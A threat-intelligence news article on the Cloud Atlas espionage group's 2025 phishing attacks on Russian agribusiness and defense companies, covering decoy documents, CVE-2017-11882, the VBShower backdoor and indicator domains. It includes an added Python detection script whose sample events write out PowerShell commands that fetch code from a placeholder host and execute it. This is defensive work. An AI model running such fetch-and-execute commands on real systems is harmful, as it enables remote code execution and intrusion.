In 2025, F6 specialists have recorded increased activity by the Cloud Atlas group, which is targeting Russian and Belarusian companies. Researchers reported that ahead of the forum “Grain and Oilseeds 2025: Feed Vector,” which will take place on October 30 in Moscow, the attackers sent a malicious email to an agribusiness enterprise disguised as the forum program.
Cloud Atlas is a “government-linked” APT group specializing in cyber-espionage and the theft of confidential data, active since 2014. It typically uses complex multi-stage attacks employing custom loaders and encrypted communication channels to covertly collect data.
In a new report, researchers describe recent Cloud Atlas attacks on enterprises in the agro-industrial and defense-industrial sectors. Overall, the attackers keep the infection chain itself unchanged, but these attacks are characterized by changes to the top-level domains, as well as experimentation with the malware delivered via phishing emails.
In mid-October, researchers observed another Cloud Atlas attack targeting a Russian agribusiness enterprise — the group sent a malicious attachment from the email address mkrutij@list[.]ru.
As bait, the attackers used the agenda of the agro-industrial forum “Grain and Oilseeds 2025: The Feed Vector,” which will take place on October 30, 2025, in Moscow.
The malicious attachment “Программа Форум Зерно и масличные.doc” did indeed contain the forum agenda, but opening it triggered the launch of the payload delivery mechanism.
The decoy DOC file acted as the downloader: via a remote template it fetched an RTF file containing an exploit for the Microsoft Office vulnerability CVE-2017-11882. Once the template loaded and the vulnerability was exploited, the us.txt dropper was downloaded, carrying the payload — the VBShower backdoor.
It is noted that in the fall of 2025 this was not the group’s first attack targeting agribusiness enterprises. For example, during a similar incident recorded in September, the attackers sent emails with the subject “Бланк ТЧ” and a malicious attachment “Бланк ТЧ.doc.” Opening such a document also led to the download of an RTF file, and the payload was likewise VBShower.
During the analysis of the October attack, researchers discovered two additional files linked to the hackers’ domain (kommando[.]live) that were uploaded to VirusTotal: “Request_for_demographic_data_of_enterprises_for_2025_for_medical_services.doc” and “Appendix_ Request to conduct a procurement.doc”.
The names and contents of these files—related to procurement and the collection of enterprise employee data—suggest that Cloud Atlas targeted not only the agro-industrial sector, but also companies in Russia’s defense-industrial complex.
Subsequently, using analysis of the network infrastructure and file characteristics, F6 specialists discovered the domain atelierdebondy[.]fr, which was used by the attackers as a remote server to download the template.
It is noted that the domains the group usually uses for attacks fall into four zones — com, net, org, and info. However, in this fall’s attacks, as described above, the domain zones used were highly atypical for Cloud Atlas.
Experts say they have been observing the group’s experiments for about two years, and these changes involve not only switching top-level domains but also methods of delivering payloads.
For example, at the end of 2024, two LNK files were uploaded to VirusTotal. In both cases, when the LNK was executed, a PDF document was shown to the user as a lure, after which a request to a URL was made via Invoke-RestMethod with the User-Agent set to “Mozilla/4.0 (compatible; Windows NT 10.0; MSOffice 16)”. The server’s response was then passed to the Invoke-Expression cmdlet to execute a PowerShell command on the victim’s computer.
Later, in July 2025, two LNK files were uploaded to VirusTotal that matched the samples uploaded at the end of 2024. The attackers made almost no changes to the commands, except for adding the string ms-office; to the User-Agent field. In addition, the server’s response returned by the command was now passed to the cmdlet as an explicit parameter, to reduce the risk of detection.
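A detection pass over the LNK behaviour described in the two paragraphs above, written here as an added example rather than code from F6's report: it flags the reported User-Agent (with or without the later ms-office; token) and PowerShell script blocks that hand an Invoke-RestMethod result to Invoke-Expression, whether by pipeline or as an explicit argument. The sample events, the placeholder host example.invalid and the position of the ms-office; token inside the string are assumptions.

```python
import re
from typing import List, Optional, Tuple
# User-Agent reported for the late-2024 LNK samples; the July 2025 samples add an "ms-office;" token.
BASE_UA = "Mozilla/4.0 (compatible; Windows NT 10.0; MSOffice 16)"

def ua_matches(ua: str) -> bool:
    """True for the base User-Agent or its 2025 variant. Assumption: the 'ms-office;' token's
    position is not fixed, so it is stripped wherever it appears before comparing."""
    stripped = re.sub(r"\bms-office;", "", ua, flags=re.IGNORECASE)
    return re.sub(r"\s+", " ", stripped).replace("( ", "(").strip() == BASE_UA
# Invoke-RestMethod (or its alias irm) feeding Invoke-Expression (or iex): either through a
# pipeline or passed as the cmdlet's argument, the explicit-parameter form the July 2025 samples use.
_FETCH = r"(?:Invoke-RestMethod|\birm\b)"
_EXEC = r"(?:Invoke-Expression|\biex\b)"
PIPE_RE = re.compile(_FETCH + r"[^|\n]*\|\s*" + _EXEC, re.IGNORECASE)
PARAM_RE = re.compile(_EXEC + r"\s+(?:-Command\s+)?\(\s*" + _FETCH, re.IGNORECASE)

def classify_script(script: str) -> Optional[str]:
    """Label the fetch-then-execute pattern in a PowerShell script block, if any."""
    if PIPE_RE.search(script):
        return "irm-pipe-iex"
    if PARAM_RE.search(script):
        return "irm-as-iex-argument"
    return None

# Constructed sample events (not from the report): a proxy-log User-Agent joined to the
# PowerShell script block (event ID 4104) that issued the request; example.invalid is a placeholder.
SAMPLE_EVENTS = [
    {"id": 1, "user_agent": BASE_UA,
     "script": "Invoke-RestMethod -Uri 'http://example.invalid/p' -UserAgent $ua | Invoke-Expression"},
    {"id": 2, "user_agent": "Mozilla/4.0 (compatible; ms-office; Windows NT 10.0; MSOffice 16)",
     "script": "Invoke-Expression -Command (Invoke-RestMethod -Uri 'http://example.invalid/p' -UserAgent $ua)"},
    {"id": 3, "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
     "script": "Invoke-RestMethod -Uri 'https://example.invalid/status' | ConvertTo-Json"},
]

def triage(events) -> List[Tuple[int, List[str]]]:
    """Return (event id, reasons) for every event that trips at least one indicator."""
    hits = []
    for ev in events:
        reasons = []
        if ua_matches(ev["user_agent"]):
            reasons.append("cloud-atlas-user-agent")
        kind = classify_script(ev["script"])
        if kind:
            reasons.append(kind)
        if reasons:
            hits.append((ev["id"], reasons))
    return hits
```

Events 1 and 2 are flagged on both the User-Agent and the fetch-then-execute pattern; event 3, an ordinary REST call, is not.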
Experts conclude that the analysis demonstrates the group’s diverse approach to its infrastructure, including switches to other top-level domains, as well as the variety of loaders it employs. According to F6 specialists, all this indicates a high degree of adaptability on the part of Cloud Atlas.